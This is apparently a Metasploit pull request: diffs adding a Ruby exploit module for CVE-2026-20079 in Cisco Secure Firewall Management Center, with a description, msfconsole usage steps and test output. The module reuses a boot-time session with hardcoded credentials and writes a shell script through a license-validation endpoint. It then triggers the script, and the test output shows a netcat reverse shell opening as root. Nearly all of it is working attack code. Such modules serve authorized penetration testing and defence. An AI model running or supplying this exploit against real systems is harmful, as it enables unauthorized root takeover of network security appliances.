+          FIFO/netcat payload were tested against Cisco Secure FMC 10.0.1-1.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Brandon Sakai (Cisco) - vulnerability discovery',
+          'Cale Black (VulnCheck) - exploit-chain research',
+          'Arian Eidizadeh (CyberAuth) - independent PoC reproduction and Metasploit module'
+        ],
+        'References' => [
+          ['CVE', '2026-20079'],
+          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-onprem-fmc-authbypass-5JPp45V2'],
+          ['URL', 'https://www.vulncheck.com/blog/cisco-fmc-auth-bypass-cve-2026-20079'],
+          ['URL', 'https://github.com/CyberAuth/CVE-2026-20079'],
+          ['URL', 'https://banks.tools/writeups/cve-2026-20079-cisco-secure-fmc']
+        ],
+        'DisclosureDate' => '2026-03-04',
+        'Privileged' => true,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat',
+                'ShellPath' => '/bin/sh -i'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [UNRELIABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptInt.new('TIMEOUT', [true, 'HTTP request timeout in seconds', 15])
+    ])
+  end
+
+  def check
+    root_response = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => '/'
+      },
+      datastore['TIMEOUT']
+    )
+    return CheckCode::Unknown('The target did not respond to the root request') unless root_response
+
+    if root_response.code.between?(200, 299) && fmc_detected?(root_response.body)
+      return CheckCode::Detected(
+        'Cisco Secure Firewall Management Center product markers were found in the root response; vulnerability was not tested'
+      )
+    end
+
+    location = root_response.headers['Location']
+    unless root_response.redirect? && location && !location.empty?
+      return CheckCode::Safe('The root response did not identify Cisco Secure Firewall Management Center')
+    end
+
+    login_uri = validated_login_redirect(location)
+    return CheckCode::Safe('The root response redirected to an unexpected or unsafe location') unless login_uri
+
+    login_response = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => login_uri
+      },
+      datastore['TIMEOUT']
+    )
+    return CheckCode::Unknown('The same-origin Cisco Secure FMC login path did not respond') unless login_response
+
+    unless login_response.code.between?(200, 299)
+      return CheckCode::Safe("The Cisco Secure FMC login path returned HTTP #{login_response.code}")
+    end
+
+    if fmc_detected?(login_response.body)
+      return CheckCode::Detected(
+        'Cisco Secure Firewall Management Center product markers were found at the same-origin /ui/login path; vulnerability was not tested'
+      )
+    end
+
+    CheckCode::Unknown('The same-origin /ui/login path was present, but Cisco Secure Firewall Management Center product markers were not found')
+  rescue ::URI::Error => e
+    CheckCode::Unknown("The login redirect could not be parsed: #{e.message}")
+  end
+
+  def exploit
+    print_status("Upgrading the boot-created #{STATIC_SESSION} session")
+    upgrade_session
+
+    print_status('Retrieving the session-specific sf_action_id')
+    action_id = extract_action_id
+    print_good('Obtained a valid session-specific sf_action_id')
+
+    execute_command(payload.encoded, action_id)
+  end
+
+  def fmc_detected?(body)
+    bounded_body = body.to_s.byteslice(0, MAX_FINGERPRINT_BYTES).to_s.downcase
+    return true if bounded_body.include?('secure firewall management center')
+
+    bounded_body.include?('/img/cisco-icon.svg') &&
+      bounded_body.match?(/\bmanagement\s+center\b/)
+  end
+
+  def validated_login_redirect(location)
+    original = ::URI.parse(full_uri('/', vhost_uri: true))
+    redirected = ::URI.join(original.to_s, location)
+
+    return nil if redirected.user || redirected.password || redirected.query || redirected.fragment
+    return nil unless redirected.path == '/ui/login'
+    return nil unless same_origin?(original, redirected)
+
+    redirected.request_uri
+  end
+
+  def same_origin?(first_uri, second_uri)
+    first_uri.scheme.to_s.casecmp?(second_uri.scheme.to_s) &&
+      first_uri.host.to_s.casecmp?(second_uri.host.to_s) &&
+      first_uri.port == second_uri.port
+  end
+
+  def target_origin
+    full_uri('/', vhost_uri: true).delete_suffix('/')
+  end
+
+  def session_cookie
+    "CGISESSID=#{STATIC_SESSION}"
+  end
+
+  def upgrade_session
+    response = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => '/login.cgi',
+        'vars_get' => { 'logon' => 'Continue' },
+        'vars_post' => {
+          'username' => MACHINE_USERNAME,
+          'password' => MACHINE_PASSWORD,
+          'target' => ''
+        },
+        'cookie' => session_cookie,
+        'headers' => {
+          'Origin' => target_origin,
+          'Referer' => "#{target_origin}/"
+        }
+      },
+      datastore['TIMEOUT']
+    )
+
+    fail_with(Failure::Unreachable, 'The target did not respond to the session-upgrade request') unless response
+    return if response.code == 302
+
+    failure_message = "Expected HTTP 302 from the session upgrade, but received HTTP #{response.code}. " \
+                      'The required startup session may no longer exist, the target may be patched, ' \
+                      'or the target may not be in the expected vulnerable state.'
+    fail_with(Failure::NotVulnerable, failure_message)
+  end
+
+  def extract_action_id
+    response = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => '/ui/user/general',
+        'cookie' => session_cookie
+      },
+      datastore['TIMEOUT']
+    )
+
+    fail_with(Failure::Unreachable, 'The target did not respond while retrieving sf_action_id') unless response
+    unless response.code == 200
+      failure_message = "The authenticated page returned HTTP #{response.code}; " \
+                        'the authentication bypass was not confirmed'
+      fail_with(Failure::NoAccess, failure_message)
+    end
+
+    match = response.body.to_s.match(ACTION_ID_REGEX)
+    unless match
+      failure_message = 'The authenticated page did not expose a valid sf_action_id; ' \
+                        'the authentication bypass was not confirmed'
+      fail_with(Failure::NoAccess, failure_message)
+    end
+
+    match[1].downcase
+  end
+
+  def build_makeself_script(command)
+    cleanup_command = "rm -f #{TEMPORARY_SCRIPT}"
+
+    [
+      '#!/bin/sh',
+      '# This script was generated using Makeself',
+      '',
+      cleanup_command,
+      "trap '#{cleanup_command}' 0",
+      "trap '#{cleanup_command};exit 1' HUP INT TERM",
+      command,
+      cleanup_command,
+      ''
+    ].join("\n")
+  end
+
+  def unicode_newline_json(value)
+    value.to_json.gsub(/\\+n/) do |escape_sequence|
+      slash_count = escape_sequence.length - 1
+      next escape_sequence if slash_count.even?
+
+      ('\\' * (slash_count - 1)) + '\\u000A'
+    end
+  end
+
+  def write_payload(action_id, script)
+    request_body = unicode_newline_json([action_id, 'validateLicense', script])
+
+    response = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => '/sajaxintf.cgi',
+        'vars_get' => {
+          'rs' => 'callServerFunc',
+          'rstime' => (Time.now.to_f * 1000).to_i
+        },
+        'ctype' => 'application/json',
+        'data' => request_body,
+        'cookie' => session_cookie,
+        'headers' => {
+          'Origin' => target_origin,
+          'Referer' => "#{target_origin}/platinum/IDSRuleList.cgi"
+        }
+      },
+      datastore['TIMEOUT']
+    )
+
+    unless response
+      failure_message = 'The target did not return the expected file-write response. Refusing to trigger execution; ' \
+                        "#{TEMPORARY_SCRIPT} may require authorized manual review."
+      fail_with(Failure::Unreachable, failure_message)
+    end
+
+    unless response.code == 200 && response.body.to_s.include?('License is Invalid')
+      failure_message = 'The validateLicense response did not confirm the expected file-write behavior. ' \
+                        "Refusing to trigger execution; #{TEMPORARY_SCRIPT} may require authorized manual review."
+      fail_with(Failure::UnexpectedReply, failure_message)
+    end
+
+    print_good('The target returned the expected validateLicense file-write response')
+  end
+
+  def trigger_payload(action_id)
+    parameters = [TEMPORARY_SCRIPT, [SecureRandom.uuid]].to_json
+
+    response = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => '/pjb.cgi',
+        'vars_post' => {
+          'function' => 'SF::UI::DataObjectLibrary::upgradeReadinessCall',
+          'parameters' => parameters,
+          'get_all_errors' => '1',
+          'sf_action_id' => action_id,
+          'ss' => ''
+        },
+        'cookie' => session_cookie,
+        'headers' => {
+          'Origin' => target_origin
+        }
+      },
+      datastore['TIMEOUT']
+    )
+
+    unless response
+      print_warning(
+        'The trigger request timed out or the connection closed after submission. ' \
+        'This can be expected; only a new Metasploit session confirms command execution.'
+      )
+      return
+    end
+
+    unless response.code == 200
+      failure_message = "The trigger returned HTTP #{response.code} instead of the expected HTTP 200; " \
+                        'no command execution was confirmed'
+      fail_with(Failure::UnexpectedReply, failure_message)
+    end
+
+    print_status(
+      'The trigger returned HTTP 200; waiting for the payload handler because HTTP success alone does not prove command execution'
+    )
+  end
+
+  def execute_command(command, action_id)
+    script = build_makeself_script(command)
+
+    print_status("Writing the Makeself-compatible payload to #{TEMPORARY_SCRIPT}")
+    write_payload(action_id, script)
+
+    print_status('Triggering the payload through upgradeReadinessCall')
+    trigger_payload(action_id)
+  end
+end

--- a/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
+++ b/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
@@ -7,11 +7,12 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
   prepend Msf::Exploit::Remote::AutoCheck
 
   STATIC_SESSION = 'csm_processes'
-  MACHINE_USERNAME = 'report'
-  MACHINE_PASSWORD = 'snortrules'
+  SESSION_UPGRADE_USERNAME = 'report'
+  SESSION_UPGRADE_PASSWORD = 'snortrules'
   TEMPORARY_SCRIPT = '/var/tmp/license.tmp'
   MAX_FINGERPRINT_BYTES = 512 * 1024
   ACTION_ID_REGEX = /var\s+sf_action_id\s*=\s*["']([0-9a-fA-F]{32})["']/
@@ -38,9 +39,9 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Brandon Sakai (Cisco) - vulnerability discovery',
-          'Cale Black (VulnCheck) - exploit-chain research',
-          'Arian Eidizadeh (CyberAuth) - independent PoC reproduction and Metasploit module'
+          'Brandon Sakai', # (Cisco) - vulnerability discovery
+          'Cale Black', # (VulnCheck) - exploit-chain research
+          'Arian Eidizadeh' # (CyberAuth) - independent PoC reproduction and Metasploit module
         ],
         'References' => [
           ['CVE', '2026-20079'],
@@ -72,14 +73,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [UNRELIABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
         }
       )
     )
-
-    register_options([
-      OptInt.new('TIMEOUT', [true, 'HTTP request timeout in seconds', 15])
-    ])
   end
 
   def check
@@ -87,8 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
       {
         'method' => 'GET',
         'uri' => '/'
-      },
-      datastore['TIMEOUT']
+      }
     )
     return CheckCode::Unknown('The target did not respond to the root request') unless root_response
 
@@ -107,8 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'method' => 'GET',
           'uri' => login_uri
-        },
-        datastore['TIMEOUT']
+        }
       )
       return CheckCode::Unknown('The same-origin Cisco Secure FMC login path did not respond') unless login_response
 
@@ -152,8 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
       {
         'method' => 'GET',
         'uri' => '/help/about.cgi'
-      },
-      datastore['TIMEOUT']
+      }
     )
 
     unless control_response
@@ -175,8 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'method' => 'GET',
         'uri' => '/help/about.cgi',
         'cookie' => session_cookie
-      },
-      datastore['TIMEOUT']
+      }
     )
 
     unless session_response
@@ -242,8 +235,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => '/login.cgi',
         'vars_get' => { 'logon' => 'Continue' },
         'vars_post' => {
-          'username' => MACHINE_USERNAME,
-          'password' => MACHINE_PASSWORD,
+          'username' => SESSION_UPGRADE_USERNAME,
+          'password' => SESSION_UPGRADE_PASSWORD,
           'target' => ''
         },
         'cookie' => session_cookie,
@@ -251,8 +244,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Origin' => target_origin,
           'Referer' => "#{target_origin}/"
         }
-      },
-      datastore['TIMEOUT']
+      }
     )
 
     fail_with(Failure::Unreachable, 'The target did not respond to the session-upgrade request') unless response
@@ -270,8 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'method' => 'GET',
         'uri' => '/ui/user/general',
         'cookie' => session_cookie
-      },
-      datastore['TIMEOUT']
+      }
     )
 
     fail_with(Failure::Unreachable, 'The target did not respond while retrieving sf_action_id') unless response
@@ -341,8 +332,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Origin' => target_origin,
           'Referer' => "#{target_origin}/platinum/IDSRuleList.cgi"
         }
-      },
-      datastore['TIMEOUT']
+      }
     )
 
     unless response
@@ -378,8 +368,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'headers' => {
           'Origin' => target_origin
         }
-      },
-      datastore['TIMEOUT']
+      }
     )
 
     unless response
@@ -414,6 +403,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Writing the Makeself-compatible payload to #{TEMPORARY_SCRIPT}")
     write_payload(action_id, script)
+    register_file_for_cleanup(TEMPORARY_SCRIPT)
 
     print_status('Triggering the payload through upgradeReadinessCall')
     trigger_payload(action_id)

--- a/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
+++ b/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
@@ -52,11 +52,11 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2026-03-04',
         'Privileged' => true,
-        'Platform' => 'unix',
+        'Platform' => ['unix', 'linux'],
         'Arch' => ARCH_CMD,
         'Targets' => [
           [
-            'Unix Command',
+            'Unix/Linux Command',
             {
               'Type' => :unix_cmd,
               'DefaultOptions' => {

--- a/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
+++ b/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [UNRELIABLE_SESSION, EVENT_DEPENDENT],
+          'Reliability' => [UNRELIABLE_SESSION],
           'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
         }
       )
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     return CheckCode::Unknown('The target did not respond to the root request') unless root_response
 
-    if root_response.code.between?(200, 299) && fmc_detected?(root_response.body)
+    if fmc_detected?(root_response.body)
       return CheckCode::Detected(
         'Cisco Secure Firewall Management Center product markers were found in the root response; vulnerability was not tested'
       )
@@ -135,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Retrieving the session-specific sf_action_id')
     action_id = extract_action_id
-    print_good('Obtained a valid session-specific sf_action_id')
+    print_good("Obtained a valid session-specific sf_action_id: #{action_id}")
 
     execute_command(payload.encoded, action_id)
   end

--- a/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
+++ b/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
@@ -351,7 +351,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def trigger_payload(action_id)
-    parameters = [TEMPORARY_SCRIPT, [SecureRandom.uuid]].to_json
+    parameters = [TEMPORARY_SCRIPT, [Faker::Internet.uuid]].to_json
 
     response = send_request_cgi(
       {


### PR DESCRIPTION
## Description

This adds a native Metasploit exploit module for CVE-2026-20079, an
unauthenticated authentication bypass in Cisco Secure Firewall Management
Center (FMC).

The module upgrades the boot-created `csm_processes` session, retrieves its
session-specific `sf_action_id`, writes a Makeself-compatible command script
through `validateLicense`, and triggers it through `upgradeReadinessCall`.
Successful exploitation executes the selected Unix command payload as root.

The module provides bounded, authorized validation of this vulnerability on a
single FMC target while preserving the request sequence of the independently
validated public PoC.

Module path:

`modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb`

Documentation path:

`documentation/modules/exploit/linux/http/cisco_fmc_auth_bypass_rce.md`

Disclosure date: March 4, 2026.

References:

- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-onprem-fmc-authbypass-5JPp45V2
- https://www.vulncheck.com/blog/cisco-fmc-auth-bypass-cve-2026-20079
- https://github.com/CyberAuth/CVE-2026-20079
- https://banks.tools/writeups/cve-2026-20079-cisco-secure-fmc

## Breaking Changes

None.

## Reviewer Notes

The `check` method performs a bounded, GET-only authentication differential.
FMC identification requires both the Cisco icon path and the structured
`"deviceLabel":"Management Center"` value. The module checks the root response
first and follows only an exact, same-origin `/ui/login` redirect without URL
credentials, a query, or a fragment.

After identifying FMC, the module requests `/help/about.cgi` without a cookie.
Only when that control request returns HTTP 302 with `Invalid session ID` does
it request the same endpoint with `CGISESSID=csm_processes`. The check returns
`Appears` only when the second response is HTTP 200 HTML containing all four
protected about-page markers. If FMC is identified but the transient session
is unavailable or the protected response cannot be confirmed, it returns
`Detected` rather than `Safe`.

The check does not submit the machine credential, call the session-upgrade
endpoint, obtain an action token, write a file, or execute a command. The
cookie-bearing GET may still be logged or affect ordinary session access
metadata.

Exploitation requires the transient boot-created `csm_processes` session.
Normal authenticated activity or session cleanup may remove that session. The
module does not recommend rebooting an FMC to restore this prerequisite.

The target accepts `ARCH_CMD` payloads without forcing a default payload. The
tested and recommended payload is `cmd/unix/reverse_netcat`, whose FIFO/netcat
callback with `ShellPath` set to `/bin/sh -i` was validated on the tested
appliance. No native executable or Meterpreter target is included because no
appliance CPU architecture was established through authorized testing.

The JSON serializer rewrites only escapes corresponding to actual newline
characters. Literal backslash sequences in command payloads remain unchanged.
The module rejects the all-zero action-token placeholder before attempting the
file write.

The generated script removes `/var/tmp/license.tmp` before executing the
payload and installs exit and signal cleanup traps. If the trigger times out,
the connection closes, or the trigger returns a non-200 response, the module
warns that cleanup is unverified. Cleanup does not restore the upgraded
server-side session state.

Ruby syntax, documentation tidy, the focused behavior harness, and
`git diff --check` completed successfully. The behavior harness completed 22
runs and 63 assertions without failures. The module loaded from a current
Framework source checkout and opened a root command shell against the
authorized test target.

## Verification Steps

1. [x] Start `msfconsole` from a current Framework checkout.
2. [x] Run `use exploit/linux/http/cisco_fmc_auth_bypass_rce`.
3. [x] Run `info`, `show options`, `show targets`, and `show payloads`.
4. [x] Run `set RHOSTS 192.0.2.10` and replace it with the authorized FMC address.
5. [x] Run `set RPORT 443`.
6. [x] Run `set SSL true`.
7. [x] Run `set PAYLOAD cmd/unix/reverse_netcat`.
8. [x] Run `set LHOST 192.0.2.20` and replace it with the authorized callback address.
9. [x] Run `set LPORT 4444`.
10. [x] Run `check` and confirm that it performs the bounded GET-only authentication differential.
11. [x] Run `run` while the startup-session prerequisite exists.
12. [x] Confirm that a command-shell session opens.
13. [x] Run `id` and confirm `uid=0(root)`.
14. [x] Confirm that `/var/tmp/license.tmp` is absent after execution.

## Test Evidence

The module was validated against an authorized Cisco Secure FMC `10.0.1-1`
target using `cmd/unix/reverse_netcat`. Addresses, the hostname, the ephemeral
source port, and timestamps below were replaced or omitted.

The current check returned `Detected` after it identified FMC but did not
accept the existing `csm_processes` response as the strict protected about
page:

```text
msf exploit(linux/http/cisco_fmc_auth_bypass_rce) > check
[*] 192.0.2.10:443 - The service is running, but could not be validated. Cisco Secure FMC was identified, but csm_processes did not return the expected protected content; the transient session may be unavailable or in a different state
```

The exploit validation produced the following sanitized result:

```text
[*] Started reverse TCP handler on 192.0.2.20:4444
[*] Upgrading the boot-created csm_processes session
[*] Retrieving the session-specific sf_action_id
[+] Obtained a valid session-specific sf_action_id: <redacted>
[*] Writing the Makeself-compatible payload to /var/tmp/license.tmp
[+] The target returned the expected validateLicense file-write response
[*] Triggering the payload through upgradeReadinessCall
[*] Command shell session 1 opened (192.0.2.20:4444 -> 192.0.2.10:<ephemeral>)

msf exploit(linux/http/cisco_fmc_auth_bypass_rce) > sessions -i 1
[*] Starting interaction with 1...
sh-5.1# id
uid=0(root) gid=0(root)
sh-5.1# test ! -e /var/tmp/license.tmp && echo LICENSE_TMP_ABSENT || echo LICENSE_TMP_PRESENT
LICENSE_TMP_ABSENT
```

A sanitized screen recording demonstrating successful exploitation and root
command execution was provided privately to Rapid7 at
`msfdev@metasploit.com` for PR #21796.

## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Kali Linux with a current Metasploit Framework source checkout; also tested with packaged Metasploit |
| **Target Software/Hardware** | Cisco Secure Firewall Management Center 10.0.1-1 |

## AI Usage Disclosure

OpenAI Codex was used only to assist with implementation and review of the
Metasploit module and its documentation. The original Python PoC, exploit-chain
reproduction, and authorized target validation were completed independently
before this work and were not AI-generated.

## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules`
- [x] No sensitive information in the module or documentation
- [x] Tested on Cisco Secure FMC 10.0.1-1
- [x] Ruby syntax validation completed
- [x] Documentation tidy validation completed
- [x] Focused behavior harness completed with 22 runs and 63 assertions
- [x] Module loaded and opened a root command-shell session in Kali
- [x] Sanitized screen recording emailed privately to Rapid7
- [x] RSpec tests are not applicable because no Framework library code changed
- [x] Read `CONTRIBUTING.md` and the module acceptance guidelines
